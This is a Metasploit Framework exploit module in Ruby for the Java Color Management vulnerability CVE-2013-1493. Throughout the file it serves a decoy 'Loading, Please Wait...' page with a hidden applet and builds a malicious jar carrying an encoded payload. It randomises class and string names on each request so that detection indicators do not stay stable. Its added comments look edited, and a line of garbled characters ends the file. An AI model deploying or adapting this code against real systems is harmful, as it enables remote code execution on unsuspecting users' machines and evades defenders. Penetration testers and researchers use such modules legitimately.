##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
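# Framework core and the Rex support library; the curly quotes in the
# transcribed copy are not valid Ruby string delimiters.
require 'msf/core'
require 'rex'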
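# Browser exploit module for CVE-2013-1493 (Java Color Management Module).
#
# The embedded HTTP server serves a loader page whose <applet> tag points at a
# jar that is assembled per request from the encoded payload plus four
# precompiled class files shipped under data/exploits/cve-2013-1493. Per the
# module description, click-to-play is not bypassed: the user has to accept the
# Java warning before the applet runs.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # The loader page contains no JavaScript; only the applet tag is needed.
  autopwn_info({ :javascript => false })

  # Module metadata. +info+ is merged with these defaults by update_info and
  # passed on to the Msf::Exploit::Remote constructor.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      # Index 1 = native Windows x86 payload. (In the transcribed copy this key
      # had drifted into on_request_uri, where it is a syntax error.)
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four precompiled applet classes and randomises the name of the
  # entry-point class before the HTTP server is started by +super+.
  def setup
    @init_class           = load_class_file('Init.class')
    @leak_class           = load_class_file('Leak.class')
    @buffered_image_class = load_class_file('MyBufferedImage.class')
    @color_space_class    = load_class_file('MyColorSpace.class')

    # The replacement has the same length as "Init" -- presumably so the
    # length-prefixed string entries inside the class file remain consistent.
    @init_class_name = rand_text_alpha('Init'.length)
    @init_class.gsub!('Init', @init_class_name)

    super
  end

  # HTTP request handler.
  #
  # * +*.jar+  -> builds and returns the applet jar.
  # * +.../+   -> regenerates the payload and returns the loader page.
  # * anything else -> redirects to the resource root.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file('Leak.class', @leak_class)
      jar.add_file('MyBufferedImage.class', @buffered_image_class)
      jar.add_file('MyColorSpace.class', @color_space_class)

      # Entry names and contents are rewritten with fresh random strings on every
      # request, so the literals "metasploit" and "Payload" (like the Init class
      # name above) are not stable indicators of this jar.
      metasploit_str = rand_text_alpha('metasploit'.length)
      payload_str = rand_text_alpha('payload'.length)
      jar.entries.each do |entry|
        entry.name.gsub!('metasploit', metasploit_str)
        entry.name.gsub!('Payload', payload_str)
        entry.data = entry.data.gsub('metasploit', metasploit_str)
        entry.data = entry.data.gsub('Payload', payload_str)
      end

      jar.build_manifest
      send_response(cli, jar, { 'Content-Type' => 'application/octet-stream' })
    when /\/$/
      # Local renamed from +payload+ so it no longer shadows the payload accessor.
      regenerated = regenerate_payload(cli)
      unless regenerated
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end

      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Builds the loader page: an <applet> tag whose archive name is random per
  # request and whose code attribute is the entry class chosen in +setup+.
  #
  # @return [String] the HTML document
  def generate_html
    html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html << %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html << %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html << %Q|</applet></body></html>|
    html
  end

  private

  # Reads one precompiled class file, as binary, from
  # data/exploits/cve-2013-1493 under the framework install root.
  #
  # @param name [String] file name inside that directory
  # @return [String] the raw class bytes
  def load_class_file(name)
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'cve-2013-1493', name)
    File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }
  end
end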
9 b1 l/ I5 e2 e8 ^" n$ c% D$ _ |